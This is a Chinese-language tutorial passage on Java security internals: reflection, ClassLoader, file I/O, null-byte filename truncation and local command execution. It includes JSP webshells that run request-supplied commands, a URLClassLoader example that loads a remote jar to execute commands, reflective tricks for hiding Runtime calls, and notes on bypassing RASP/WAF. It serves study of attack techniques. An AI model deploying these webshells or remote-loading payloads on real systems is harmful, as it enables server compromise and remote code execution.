所以反射应用在无法知晓操作对象或类属于什么类，只能依靠运行时的信息获取该类的信息，比如spring根据xml来创建一个类，就是反射的应用。

Java 反射机制的核心是 Class 类。在 Java 中，每个类在被加载到 JVM 时，都会创建一个对应的 Class 对象，这个 Class 对象包含了该类的所有元数据信息，如类的名称、父类、接口、字段、方法、构造函数等。通过 Class 对象，我们可以在运行时动态地获取和操作这些信息。

#获取Class对象

Java反射操作的是java.lang.Class对象，所以我们需要先想办法获取到Class对象，通常我们有如下几种方式获取一个类的Class对象：

类名.class，如:java.lang.Runtime.class;。
Class.forName("java.lang.Runtime");
ClassLoader.getSystemClassLoader().loadClass(java.lang.Runtime.class);

获取数组类型的Class对象需要特殊注意,需要使用Java类型的描述符方式，如下：

Class doubleArray = Class.forName("[D");//相当于double[].classClass cStringArray = Class.forName("[[Ljava.lang.String;");// 相当于String[][].class

类型描述符（Type Descriptor）是一种用于以紧凑、机器可读的格式表示 Java 类型的方式，常用于字节码操作、反射和序列化等场景。
基本数据类型有对应的单字符描述符：
基本数据类型描述符
boolean Z
byte B
char C
short S
int I
long J
float F
double D
对于引用类型（类、接口、数组等），描述符是该类型的全限定名，并且用斜杠 / 代替点号 .，并在前面加上 L，后面加上分号 ;。例如：
java.lang.String 的描述符是 Ljava/lang/String;
自定义类 com.example.MyClass 的描述符是 Lcom/example/MyClass;
数组类型的描述符以 [ 开头，后面跟着元素类型的描述符。例如：
一维 int 数组 int[] 的描述符是 [I
二维 int 数组 int[][] 的描述符是 [[I
一维 String 数组 String[] 的描述符是 [Ljava/lang/String;

基本数据类型	描述符
`boolean`	`Z`
`byte`	`B`
`char`	`C`
`short`	`S`
`int`	`I`
`long`	`J`
`float`	`F`
`double`	`D`

#反射java.lang.Runtime

java.lang.Runtime因为有一个exec方法可以执行本地命令，所以在很多的payload中我们都能看到反射调用Runtime类来执行本地系统命令，通过学习如何反射Runtime类也能让我们理解反射的一些基础用法。

不使用反射执行本地命令代码片段：

// 输出命令执行结果System.out.println(org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("whoami").getInputStream(), "UTF-8"));

如果使用反射就会比较麻烦了，我们不得不需要间接性的调用Runtime的exec方法。

Class runtimeClass1 = Class.forName("java.lang.Runtime");// 获取Runtime类对象Constructor constructor = runtimeClass1.getDeclaredConstructor();// 获取无参构造方法（getDeclaredConstructor 可以获取类中所有访问权限（包括私有、受保护和公共）的构造方法。）constructor.setAccessible(true);// Runtime 类的构造方法是私有的，默认情况下不能直接访问。setAccessible(true) 方法用于设置该构造方法的可访问性，将其访问权限设置为可访问，这样就可以绕过 Java 的访问控制机制来调用私有构造方法。Object runtimeInstance = constructor.newInstance();// 创建Runtime类示例，等价于 Runtime rt = new Runtime();Method runtimeMethod = runtimeClass1.getMethod("exec", String.class);// 获取Runtime的exec(String cmd)方法/* getMethod(String name, Class... parameterTypes)，name是要获取的方法名，parameterTypes是参数类型，注意一一对应。*/Process process = (Process) runtimeMethod.invoke(runtimeInstance, cmd);// 调用exec方法，等价于 rt.exec(cmd);InputStream in = process.getInputStream();// 获取命令执行结果System.out.println(org.apache.commons.io.IOUtils.toString(in, "UTF-8"));// 输出命令执行结果

反射调用Runtime实现本地命令执行的流程如下：

反射获取Runtime类对象(Class.forName("java.lang.Runtime"))。
使用Runtime类的Class对象获取Runtime类的无参数构造方法(getDeclaredConstructor())，因为Runtime的构造方法是private的我们无法直接调用，所以我们需要通过反射去修改方法的访问权限(constructor.setAccessible(true))。
获取Runtime类的exec(String)方法(runtimeClass1.getMethod("exec", String.class);)。
调用exec(String)方法(runtimeMethod.invoke(runtimeInstance, cmd))。

上面的代码每一步都写了非常清晰的注释，接下来我们将进一步深入的了解下每一步具体含义。

反射创建类实例

在Java的任何一个类都必须有一个或多个构造方法，如果代码中没有创建构造方法那么在类编译的时候会自动创建一个无参数的构造方法。

Runtime类构造方法示例代码片段:

public class Runtime {   /** Don't let anyone else instantiate this class */  private Runtime() {}}

从上面的Runtime类代码注释我们看到它本身是不希望除了其自身的任何人去创建该类实例的，因为这是一个私有的类构造方法，所以我们没办法new一个Runtime类实例即不能使用Runtime rt = new Runtime();的方式创建Runtime对象，但示例中我们借助了反射机制，修改了方法访问权限从而间接的创建出了Runtime对象。

runtimeClass1.getDeclaredConstructor和runtimeClass1.getConstructor都可以获取到类构造方法，区别在于后者无法获取到私有方法，所以一般在获取某个类的构造方法时候我们会使用前者去获取构造方法。如果构造方法有一个或多个参数的情况下我们应该在获取构造方法时候传入对应的参数类型数组，如：clazz.getDeclaredConstructor(String.class, String.class)。

如果我们想获取类的所有构造方法可以使用：clazz.getDeclaredConstructors来获取一个Constructor数组。

获取到Constructor以后我们可以通过constructor.newInstance()来创建类实例,同理如果有参数的情况下我们应该传入对应的参数值，如:constructor.newInstance("admin", "123456")。当我们没有访问构造方法权限时我们应该调用constructor.setAccessible(true)修改访问权限就可以成功的创建出类实例了。

#反射调用类方法

Class对象提供了一个获取某个类的所有的成员方法的方法，也可以通过方法名和方法参数类型来获取指定成员方法。

获取当前类所有的成员方法：

Method[] methods = clazz.getDeclaredMethods()

获取当前类指定的成员方法：

Method method = clazz.getDeclaredMethod("方法名", 参数类型如String.class，多个参数用","号隔开);

getMethod和getDeclaredMethod都能够获取到类成员方法，区别在于getMethod只能获取到当前类和父类的所有有权限的方法(如：public)，而getDeclaredMethod能获取到当前类的所有成员方法(不包含父类)。

反射调用方法

获取到java.lang.reflect.Method对象以后我们可以通过Method的invoke方法来调用类方法。

调用类方法代码片段：

method.invoke(方法实例对象, 方法参数值，多个参数值用","隔开);

method.invoke的第一个参数必须是类实例对象，如果调用的是static方法那么第一个参数值可以传null，因为在java中调用静态方法是不需要有类实例的，因为可以直接类名.方法名(参数)的方式调用。

method.invoke的第二个参数不是必须的，如果当前调用的方法没有参数，那么第二个参数可以不传，如果有参数那么就必须严格的依次传入对应的参数类型。

#反射调用成员变量

Java反射不但可以获取类所有的成员变量名称，还可以无视权限修饰符实现修改对应的值。

获取当前类的所有成员变量：

Field fields = clazz.getDeclaredFields();

获取当前类指定的成员变量：

Field field  = clazz.getDeclaredField("变量名");

getField和getDeclaredField的区别同getMethod和getDeclaredMethod。

获取成员变量值：

Object obj = field.get(类实例对象);

修改成员变量值：

field.set(类实例对象, 修改后的值);

同理，当我们没有修改的成员变量权限时(如私有)可以使用: field.setAccessible(true)的方式修改为访问成员变量访问权限。

如果我们需要修改被final关键字修饰的成员变量，那么我们需要先修改方法

// 反射获取Field类的modifiersField modifiers = field.getClass().getDeclaredField("modifiers");// 设置modifiers修改权限modifiers.setAccessible(true);// 修改成员变量的Field对象的modifiers值modifiers.setInt(field, field.getModifiers() & ~Modifier.FINAL);/*setInt() 是 Field 类的一个方法，用于设置该 Field 对象所代表的字段的值。这里将 field 对象的 modifiers 字段的值设置为移除 final 修饰符后的结果(将filed改为field.getModifiers() & ~Modifier.FINAL)。getModifiers() 是 Field 类的一个方法，用于获取该字段的修饰符。修饰符是一个整数，不同的修饰符对应不同的位标志。Modifier 是 Java 提供的一个工具类，其中包含了许多用于表示修饰符的常量，如 Modifier.PUBLIC、Modifier.FINAL 等。Modifier.FINAL 的值是 16，在二进制中表示为 0001 0000。将 field.getModifiers() 的值和 ~Modifier.FINAL 进行按位与运算，结果上来说就是清除 field 修饰符中 final 对应的位。*/// 修改成员变量值field.set(类实例对象, 修改后的值);

#Java反射机制总结

Java反射机制是Java动态性中最为重要的体现，利用反射机制我们可以轻松的实现Java类的动态调用。Java的大部分框架都是采用了反射机制来实现的(如:Spring MVC、ORM框架等)，Java反射在编写漏洞利用代码、代码审计、绕过RASP方法限制等中起到了至关重要的作用。

#ClassLoader类加载机制

ClassLoader

Java是一个依赖于JVM（Java虚拟机）实现的跨平台的开发语言。Java程序在运行前需要先编译成class文件，Java类初始化的时候会调用java.lang.ClassLoader加载类字节码，ClassLoader会调用JVM的native方法（defineClass0/1/2）来定义一个java.lang.Class实例。

以下是JVM架构图：

一切的Java类都必须经过JVM加载后才能运行，而ClassLoader的主要作用就是Java类文件的加载。

在JVM类加载器中最顶层的是Bootstrap ClassLoader（引导类加载器）、Extension ClassLoader（扩展类加载器）、App ClassLoader（系统类加载器）。在这之中，AppClassLoader是默认的类加载器，ClassLoader.getSystemClassLoader()返回的系统类加载器也是AppClassLoader。

值得注意的是某些时候我们获取一个类的类加载器时候可能会返回一个null值，如:java.io.File.class.getClassLoader()将返回一个null对象，因为java.io.File类在JVM初始化的时候会被Bootstrap ClassLoader（引导类加载器）加载（该类加载器实现于JVM层，采用C++编写），我们在尝试获取被Bootstrap ClassLoader类加载器所加载的类的ClassLoader时候都会返回null。

ClassLoader类有如下核心方法：

loadClass（加载指定的Java类）
findClass（查找指定的Java类）
findLoadedClass（查找JVM已经加载过的类）
defineClass（定义一个Java类）
resolveClass（链接指定的Java类）

#Java类动态加载方式

Java类加载方式分为显式和隐式,显式即我们通常使用Java反射或者ClassLoader来动态加载一个类对象，而隐式指的是类名.方法名()或new类实例。显式类加载方式也可以理解为类动态加载，我们可以自定义类加载器去加载任意的类。

显式加载是主动加载一个类，隐式加载是为了达到其他目的而需要加载某个类。

常用的类动态加载方式：

// 反射加载TestHelloWorld示例Class.forName("com.anbai.sec.classloader.TestHelloWorld");// ClassLoader加载TestHelloWorld示例this.getClass().getClassLoader().loadClass("com.anbai.sec.classloader.TestHelloWorld");

Class.forName("类名")默认会初始化被加载类的静态属性和方法，如果不希望初始化类可以使用Class.forName("类名", 是否初始化类, 类加载器)，而ClassLoader.loadClass默认不会初始化类方法。

类初始化的执行内容
初始化时会按顺序执行：
静态变量的显式赋值（按代码顺序）
静态代码块（static { ... }）（按代码顺序）
注意初始化是不会执行静态方法的，需要显式调用才行。

#ClassLoader类加载流程

我们以一个Java的HelloWorld来学习ClassLoader。

ClassLoader加载com.anbai.sec.classloader.TestHelloWorld类loadClass重要流程如下：

ClassLoader会调用public Class loadClass(String name,boolen resolve)方法加载com.anbai.sec.classloader.TestHelloWorld类。
Class：指示方法返回类型，Class 是 Java 中表示类的元数据的类，是泛型通配符，表示可以是任何类的 Class 对象。
调用findLoadedClass方法检查TestHelloWorld类是否已经初始化，如果JVM已初始化过该类则直接返回类对象。
如果创建当前ClassLoader时传入了父类加载器（new ClassLoader(父类加载器)）就使用父类加载器加载TestHelloWorld类，否则使用JVM的Bootstrap ClassLoader加载。
在 ClassLoader 类中有一个受保护的字段 parent，它保存了当前类加载器的父类加载器。当你通过构造函数 ClassLoader(ClassLoader parent) 创建一个 ClassLoader 实例时，传入的父类加载器会被赋值给 parent 字段。
如果没有传入父类加载器，parent 字段会被设置为系统类加载器（System ClassLoader）的父类加载器，而系统类加载器的父类加载器是 Bootstrap ClassLoader（在 Java 代码中表现为 null，因为 Bootstrap ClassLoader 是由 JVM 底层实现的，没有对应的 Java 对象）。
如果上一步无法加载TestHelloWorld类，那么调用自身的findClass方法尝试加载TestHelloWorld类。
如果当前的ClassLoader没有重写findClass方法，那么直接返回类加载失败异常。如果当前ClassLoader重写了findClass方法并通过传入的com.anbai.sec.classloader.TestHelloWorld类名找到了对应的类字节码，那么应该调用defineClass方法去JVM中注册该类。
findClass 方法是一个受保护的方法，默认实现只是抛出 ClassNotFoundException，通常需要子类重写该方法来实现自定义的类加载逻辑。
如果调用loadClass的时候传入的resolve参数为true，那么还需要调用resolveClass方法链接类，默认为false。
返回一个被JVM加载后的java.lang.Class类对象。

#自定义ClassLoader

java.lang.ClassLoader是所有的类加载器的父类，java.lang.ClassLoader有非常多的子类加载器，比如我们用于加载jar包的java.net.URLClassLoader其本身通过继承java.lang.ClassLoader类，重写了findClass方法从而实现了加载目录class文件甚至是远程资源文件。

既然已知ClassLoader具备了加载类的能力，那么我们不妨尝试下写一个自己的类加载器来实现加载自定义的字节码（这里以加载TestHelloWorld类为例）并调用hello方法。

如果com.anbai.sec.classloader.TestHelloWorld类存在的情况下，我们可以使用如下代码即可实现调用hello方法并输出：

TestHelloWorld t = new TestHelloWorld();        String str = t.hello();        System.out.println(str);

但是如果com.anbai.sec.classloader.TestHelloWorld根本就不存在于我们的classpath，那么我们可以使用自定义类加载器重写findClass方法，然后在调用defineClass方法的时候传入TestHelloWorld类的字节码的方式来向JVM中定义一个TestHelloWorld类，最后通过反射机制就可以调用TestHelloWorld类的hello方法了。

TestClassLoader示例代码：

package com.anbai.sec.classloader;import java.lang.reflect.Method;/** * Creator: yz * Date: 2019/12/17 */public class TestClassLoader extends ClassLoader {    // TestHelloWorld类名    private static String testClassName = "com.anbai.sec.classloader.TestHelloWorld";    // TestHelloWorld类字节码    private static byte[] testClassBytes = new byte[]{            -54, -2, -70, -66, 0, 0, 0, 51, 0, 17, 10, 0, 4, 0, 13, 8, 0, 14, 7, 0, 15, 7, 0,            16, 1, 0, 6, 60, 105, 110, 105, 116, 62, 1, 0, 3, 40, 41, 86, 1, 0, 4, 67, 111, 100,            101, 1, 0, 15, 76, 105, 110, 101, 78, 117, 109, 98, 101, 114, 84, 97, 98, 108, 101,            1, 0, 5, 104, 101, 108, 108, 111, 1, 0, 20, 40, 41, 76, 106, 97, 118, 97, 47, 108,            97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 10, 83, 111, 117, 114, 99,            101, 70, 105, 108, 101, 1, 0, 19, 84, 101, 115, 116, 72, 101, 108, 108, 111, 87, 111,            114, 108, 100, 46, 106, 97, 118, 97, 12, 0, 5, 0, 6, 1, 0, 12, 72, 101, 108, 108, 111,            32, 87, 111, 114, 108, 100, 126, 1, 0, 40, 99, 111, 109, 47, 97, 110, 98, 97, 105, 47,            115, 101, 99, 47, 99, 108, 97, 115, 115, 108, 111, 97, 100, 101, 114, 47, 84, 101, 115,            116, 72, 101, 108, 108, 111, 87, 111, 114, 108, 100, 1, 0, 16, 106, 97, 118, 97, 47, 108,            97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 0, 33, 0, 3, 0, 4, 0, 0, 0, 0, 0, 2, 0, 1,            0, 5, 0, 6, 0, 1, 0, 7, 0, 0, 0, 29, 0, 1, 0, 1, 0, 0, 0, 5, 42, -73, 0, 1, -79, 0, 0, 0,            1, 0, 8, 0, 0, 0, 6, 0, 1, 0, 0, 0, 7, 0, 1, 0, 9, 0, 10, 0, 1, 0, 7, 0, 0, 0, 27, 0, 1,            0, 1, 0, 0, 0, 3, 18, 2, -80, 0, 0, 0, 1, 0, 8, 0, 0, 0, 6, 0, 1, 0, 0, 0, 10, 0, 1, 0, 11,            0, 0, 0, 2, 0, 12    };    @Override    public Class findClass(String name) throws ClassNotFoundException {        // 只处理TestHelloWorld类        if (name.equals(testClassName)) {            // 调用JVM的native方法定义TestHelloWorld类            return defineClass(testClassName, testClassBytes, 0, testClassBytes.length);        }        return super.findClass(name);    }    public static void main(String[] args) {        // 创建自定义的类加载器        TestClassLoader loader = new TestClassLoader();        try {            // 使用自定义的类加载器加载TestHelloWorld类            Class testClass = loader.loadClass(testClassName);            // 反射创建TestHelloWorld类，等价于 TestHelloWorld t = new TestHelloWorld();            Object testInstance = testClass.newInstance();            // 反射获取hello方法            Method method = testInstance.getClass().getMethod("hello");            /*上述三句也可以不创建实例直接通过类来getMethod()。*/                        // 反射调用hello方法,等价于 String str = t.hello();            String str = (String) method.invoke(testInstance);            System.out.println(str);        } catch (Exception e) {            e.printStackTrace();        }    }}

利用自定义类加载器我们可以在webshell中实现加载并调用自己编译的类对象，比如本地命令执行漏洞调用自定义类字节码的native方法绕过RASP检测，也可以用于加密重要的Java类字节码（只能算弱加密了）。

#URLClassLoader

URLClassLoader继承了ClassLoader，URLClassLoader提供了加载远程资源的能力，在写漏洞利用的payload或者webshell的时候我们可以使用这个特性来加载远程的jar来实现远程的类方法调用。

package com.anbai.sec.classloader;import java.io.ByteArrayOutputStream;import java.io.InputStream;import java.net.URL;import java.net.URLClassLoader;/** * Creator: yz * Date: 2019/12/18 */public class TestURLClassLoader {    public static void main(String[] args) {        try {            // 定义远程加载的jar路径            URL url = new URL("https://anbai.io/tools/cmd.jar");            // 创建URLClassLoader对象，并加载远程jar包            URLClassLoader ucl = new URLClassLoader(new URL[]{url});            // 定义需要执行的系统命令            String cmd = "ls";            // 通过URLClassLoader加载远程jar包中的CMD类            Class cmdClass = ucl.loadClass("CMD");            // 调用CMD类中的exec方法，等价于: Process process = CMD.exec("whoami");            Process process = (Process) cmdClass.getMethod("exec", String.class).invoke(null, cmd);            // 获取命令执行结果的输入流            InputStream           in   = process.getInputStream();            /*            InputStream 是 Java 中表示字节输入流的抽象类，它是所有字节输入流的基类。getInputStream 方法用于获取子进程的标准输出流。            */            ByteArrayOutputStream baos = new ByteArrayOutputStream();            byte[]                b    = new byte[1024];            int                   a    = -1;            // 读取命令执行结果            while ((a = in.read(b)) != -1) {                baos.write(b, 0, a);            }            // 输出命令执行结果            System.out.println(baos.toString());        } catch (Exception e) {            e.printStackTrace();        }    }}

write 方法的作用如下
baos.write(b, 0, a); 调用的是 ByteArrayOutputStream 类的 write 方法，该方法的完整签名为：
public void write(byte[] b, int off, int len)
参数解释：
- b：要写入的字节数组，这里是之前定义的用于存储从输入流读取数据的缓冲区。
- off：字节数组 b 中开始写入的起始索引，这里是 0，表示从字节数组的第一个元素开始写入。
- len：要写入的字节数，这里是 a，即 in.read(b) 实际读取的字节数。

远程的cmd.jar中就一个CMD.class文件，对应的编译之前的代码片段如下：

import java.io.IOException;/** * Creator: yz * Date: 2019/12/18 */public class CMD {    public static Process exec(String cmd) throws IOException {        return Runtime.getRuntime().exec(cmd);    }}

借助vps就可以做到rce

#类加载隔离

创建类加载器的时候可以指定该类加载的父类加载器，ClassLoader是有隔离机制的，不同的ClassLoader可以加载相同的Class（两者必须是非继承关系），同级ClassLoader跨类加载器调用方法时必须使用反射。

> 由于机制过于底层暂且跳过，之后再论

#Java文件系统安全

在Java语言中对文件的任何操作最终都是通过JNI调用C语言函数实现的。Java为了能够实现跨操作系统对文件进行操作抽象了一个叫做FileSystem的对象出来，不同的操作系统只需要实现起抽象出来的文件操作方法即可实现跨平台的文件操作了。

#Java FileSystem

在Java SE中内置了两类文件系统：java.io和java.nio，java.nio的实现是sun.nio，文件系统底层的API实现如下图：

Java IO文件系统

Java抽象出了一个叫做文件系统的对象:java.io.FileSystem，不同的操作系统有不一样的文件系统,例如Windows和Unix就是两种不一样的文件系统： java.io.UnixFileSystem和java.io.WinNTFileSystem。

java.io.FileSystem是一个抽象类，它抽象了对文件的操作，不同操作系统版本的JDK会实现其抽象的方法从而也就实现了跨平台的文件的访问操作。而Java对文件的操作最终都会调用动态链接库中C实现的Java Native方法。

由此我们可以得出Java只不过是实现了对文件操作的封装而已，最终读写文件的实现都是通过调用native方法实现的。

不过需要特别注意一下几点：

并不是所有的文件操作都在java.io.FileSystem中定义,文件的读取最终调用的是java.io.FileInputStream#read0、readBytes、java.io.RandomAccessFile#read0、readBytes,而写文件调用的是java.io.FileOutputStream#writeBytes、java.io.RandomAccessFile#write0。
Java有两类文件系统API，一个是基于阻塞模式的IO的文件系统，另一是JDK7+基于NIO.2的文件系统。即java.io和java.nio

Java NIO.2 文件系统

Java 7提出了一个基于NIO的文件系统，这个NIO文件系统和阻塞IO文件系统两者是完全独立的。java.nio.file.spi.FileSystemProvider对文件的封装和java.io.FileSystem同理。

NIO的文件操作在不同的系统的最终实现类也是不一样的，比如Mac的实现类是: sun.nio.fs.UnixNativeDispatcher,而Windows的实现类是sun.nio.fs.WindowsNativeDispatcher。

合理的利用NIO文件系统这一特性我们可以绕过某些只是防御了java.io.FileSystem的WAF或RASP。

运行时应用程序自我保护（RASP）是一种在应用上运行的技术，在应用程序运行时发挥作用，旨在实时检测针对应用程序的攻击。
一旦应用程序开始运行，RASP可以通过分析应用程序的行为和这种行文的上下文来保护它不受恶意注入或行为的影响。通过使用应用程序不断地监控其行为，攻击可以在不需要人工干预的情况下立即被识别和缓解。
摘录自RASP技术是什么，为什么这么关键

#java IO/NIO多种读写文件方式

上一章节我们提到了Java 对文件的读写分为了基于阻塞模式的IO和非阻塞模式的NIO，本章节我将列举一些我们常用于读写文件的方式。

我们通常读写文件都是使用的阻塞模式，与之对应的也就是java.io.FileSystem。java.io.FileInputStream类提供了对文件的读取功能，Java的其他读取文件的方法基本上都是封装了java.io.FileInputStream类，比如：java.io.FileReader。

对于“封装”的细节解释：
封装（Encapsulation） 的核心思想是隐藏内部实现细节，仅暴露必要的接口。
例如这里对于java.io.FileReader,它继承于InputStreamReader类，它接受一个InputStream（输入流，如FileInputStream），并将其字节流按指定编码转换为字符流(即是将字节流按指定编码转换为字符流)。
这里的封装过程大致如下：
public class FileReader extends InputStreamReader {    FileInputStream fis = new FileInputStream("file.txt");    // 创建FileInputStream，这一步负责打开文件的字节流。    InputStreamReader isr = new InputStreamReader(fis,Charset.defaultCharset());    // 包装为InputStreamReader，这里将字节流fis转换为字符流，默认使用平台编码（如UTF-8）。    public FileReader(String fileName) throws FileNotFoundException     {         super(new FileInputStream(fileName));         // 调用父类InputStreamReader的构造函数        // 通过super()将FileInputStream传递给父类InputStreamReader，完成封装。    }}
在有这样的一个FileReader类之后，我们就不需要进行读取字节流，转换为字符流等麻烦的流程，可以快速读取文件内容，调用也很方便。

FileInputStream

使用FileInputStream实现文件读取Demo:

package com.anbai.sec.filesystem;import java.io.*;/** * Creator: yz * Date: 2019/12/4 */public class FileInputStreamDemo {    public static void main(String[] args) throws IOException {        File file = new File("/etc/passwd");        // 打开文件对象并创建文件输入流        FileInputStream fis = new FileInputStream(file);        // 定义每次输入流读取到的字节数对象        int a = 0;        // 定义缓冲区大小        byte[] bytes = new byte[1024];        // 创建二进制输出流对象        ByteArrayOutputStream out = new ByteArrayOutputStream();        // 循环读取文件内容        while ((a = fis.read(bytes)) != -1) {            // 截取缓冲区数组中的内容，(bytes, 0, a)其中的0表示从bytes数组的            // 下标0开始截取，a表示输入流read到的字节数。            out.write(bytes, 0, a);        }        System.out.println(out.toString());    }}

FileOutputStream

使用FileOutputStream实现写文件Demo:

package com.anbai.sec.filesystem;import java.io.File;import java.io.FileOutputStream;import java.io.IOException;/** * Creator: yz * Date: 2019/12/4 */public class FileOutputStreamDemo {    public static void main(String[] args) throws IOException {        // 定义写入文件路径        File file = new File("/tmp/1.txt");        // 定义待写入文件内容        String content = "Hello World.";        // 创建FileOutputStream对象        FileOutputStream fos = new FileOutputStream(file);        // 写入内容二进制到文件        fos.write(content.getBytes());        fos.flush();        fos.close();    }}

代码逻辑比较简单: 打开文件->写内容->关闭文件。

RandomAccessFile

Java提供了一个非常有趣的读取文件内容的类: java.io.RandomAccessFile,这个类名字面意思是任意文件内容访问，特别之处是这个类不仅可以像java.io.FileInputStream一样读取文件，而且还可以写文件。

RandomAccessFile读取文件测试代码:

package com.anbai.sec.filesystem;import java.io.*;/** * Creator: yz * Date: 2019/12/4 */public class RandomAccessFileDemo {    public static void main(String[] args) {        File file = new File("/etc/passwd");        try {            // 创建RandomAccessFile对象,r表示以只读模式打开文件，一共有:r(只读)、rw(读写)、            // rws(读写内容同步)、rwd(读写内容或元数据同步)四种模式。            RandomAccessFile raf = new RandomAccessFile(file, "r");            // 定义每次输入流读取到的字节数对象            int a = 0;            // 定义缓冲区大小            byte[] bytes = new byte[1024];            // 创建二进制输出流对象            ByteArrayOutputStream out = new ByteArrayOutputStream();            // 循环读取文件内容            while ((a = raf.read(bytes)) != -1) {                // 截取缓冲区数组中的内容，(bytes, 0, a)其中的0表示从bytes数组的                // 下标0开始截取，a表示输入流read到的字节数。                out.write(bytes, 0, a);            }            System.out.println(out.toString());        } catch (IOException e) {            e.printStackTrace();        }    }}

任意文件读取特性体现在如下方法：

// 获取文件描述符public final FileDescriptor getFD() throws IOException // 获取文件指针public native long getFilePointer() throws IOException;// 设置文件偏移量private native void seek0(long pos) throws IOException;

java.io.RandomAccessFile类中提供了几十个readXXX方法用以读取文件系统，最终都会调用到read0或者readBytes方法，我们只需要掌握如何利用RandomAccessFile读/写文件就行了。

RandomAccessFile写文件测试代码:

package com.anbai.sec.filesystem;import java.io.File;import java.io.IOException;import java.io.RandomAccessFile;/** * Creator: yz * Date: 2019/12/4 */public class RandomAccessWriteFileDemo {    public static void main(String[] args) {        File file = new File("/tmp/test.txt");        // 定义待写入文件内容        String content = "Hello World.";        try {            // 创建RandomAccessFile对象,rw表示以读写模式打开文件，一共有:r(只读)、rw(读写)、            // rws(读写内容同步)、rwd(读写内容或元数据同步)四种模式。            RandomAccessFile raf = new RandomAccessFile(file, "rw");            // 写入内容二进制到文件            raf.write(content.getBytes());            raf.close();        } catch (IOException e) {            e.printStackTrace();        }    }}

#Java 文件名空字节截断漏洞

空字节截断漏洞漏洞在诸多编程语言中都存在，究其根本是Java在调用文件系统(C实现)读写文件时导致的漏洞，并不是Java本身的安全问题。高版本的JDK在处理文件时已经把空字节文件名进行了安全检测处理。

测试类FileNullBytes.java:

package com.anbai.sec.filesystem;import java.io.File;import java.io.FileOutputStream;import java.io.IOException;/** * @author yz */public class FileNullBytes {    public static void main(String[] args) {        try {            String           fileName = "/tmp/null-bytes.txt\u0000.jpg";            FileOutputStream fos      = new FileOutputStream(new File(fileName));            fos.write("Test".getBytes());            fos.flush();            fos.close();        } catch (IOException e) {            e.printStackTrace();        }    }}

使用JDK1.7.0.25测试成功截断文件名：

使用JDK1.7.0.80测试写文件截断时抛出java.io.FileNotFoundException: Invalid file path异常:

空字节截断利用场景

Java空字节截断利用场景最常见的利用场景就是文件上传时后端获取文件名后使用了endWith、正则使用如:.(jpg|png|gif)$验证文件名后缀合法性且文件名最终原样保存,同理文件删除(delete)、获取文件路径(getCanonicalPath)、创建文件(createNewFile)、文件重命名(renameTo)等方法也可适用。

#Java本地命令执行

Java原生提供了对本地系统命令执行的支持，黑客通常会RCE利用漏洞或者WebShell来执行系统终端命令控制服务器的目的。对于开发者来说执行本地命令来实现某些程序功能(如:ps 进程管理、top内存管理等)是一个正常的需求，而对于黑客来说本地命令执行是一种非常有利的入侵手段。

Runtime命令执行

在Java中我们通常会使用java.lang.Runtime类的exec方法来执行本地系统命令。

runtime-exec2.jsp执行cmd命令示例:

<%=Runtime.getRuntime().exec(request.getParameter("cmd"))%>

本地nc监听9000端口:nc -vv -l 9000
使用浏览器访问:http://localhost:8080/runtime-exec.jsp?cmd=curl localhost:9000。

我们可以在nc中看到已经成功的接收到了java执行了curl命令的请求了，如此仅需要一行代码一个最简单的本地命令执行后门也就写好了。但是这是个没有回显的RCE，需要修改一下：

<%=Runtime.getRuntime().exec(request.getParameter("cmd"))%><%@ page contentType="text/html;charset=UTF-8" language="java" %><%@ page import="java.io.ByteArrayOutputStream" %><%@ page import="java.io.InputStream" %><%    InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();    ByteArrayOutputStream baos = new ByteArrayOutputStream();    byte[] b = new byte[1024];    int a = -1;    while ((a = in.read(b)) != -1) {        baos.write(b, 0, a);    }    out.write("" + new String(baos.toByteArray()) + "
");%>

jsp的基本语法：
注释：<%- -%>
jsp注释语法的格式是：**<%– 这里是注释 –%>**
jsp的注释内容仅仅提供开发过程的提示作用，最后面输出到客户端的html代码中是无法看见jsp注释的。这有别于html代码的注释，html的注释是可以在客户端的源码。
声明：<%! %>
jsp声明的语法格式是:<%! 这里是声明内容 %>
之前提到，jsp会在运行的时候由容器编译成servlet文件，而servlet是一个java 对象，因此在jsp中进java变量或者方法的声明和在servlet中的声明是一样的。容器会在编译的时候将jsp中声明的变量和方法编译到对应的servlet中去，且接受private，public，static等修饰符。值得注意的是，每个servlet在容器中只存在一个实例。
输出：<%= %>
jsp输出表达式的语法格式：**<%=表达式(注意jsp表达式后面无需添加分号表示结束)%>**
jsp中的表达式语句在对应的servlet中将会编译为out.print()语句。因此起到的作用就是简化jsp的输出语法。
脚本：<% %>
jsp脚本的语法格式是：<% 这里是java程序 %>
嵌套在<% %>中的java代码就是jsp中的java脚本，jsp中的java脚本将会被容器编译成service()方法中的可执行代码，因此对于jsp脚本来说，不能在其中定义方法，因为在java中不允许在方法中定义方法。
摘录自【JavaWeb】JSP：基本语法大全

#Runtime命令执行调用链

Runtime.exec(xxx)调用链如下:

java.lang.UNIXProcess.(UNIXProcess.java:247)java.lang.ProcessImpl.start(ProcessImpl.java:134)java.lang.ProcessBuilder.start(ProcessBuilder.java:1029)java.lang.Runtime.exec(Runtime.java:620)java.lang.Runtime.exec(Runtime.java:450)java.lang.Runtime.exec(Runtime.java:347)org.apache.jsp.runtime_002dexec2_jsp._jspService(runtime_002dexec2_jsp.java:118)

通过观察整个调用链我们可以清楚的看到exec方法并不是命令执行的最终点，执行逻辑大致是：

Runtime.exec(xxx)
java.lang.ProcessBuilder.start()
new java.lang.UNIXProcess(xxx)
UNIXProcess构造方法中调用了forkAndExec(xxx) native方法。
forkAndExec调用操作系统级别fork->exec(*nix)/CreateProcess(Windows)执行命令并返回fork/CreateProcess的PID。

有了以上的调用链分析我们就可以深刻的理解到Java本地命令执行的深入逻辑了，切记Runtime和ProcessBuilder并不是程序的最终执行点!

#反射Runtime命令执行

如果我们不希望在代码中出现和Runtime相关的关键字，我们可以全部用反射代替。

reflection-cmd.jsp示例代码：

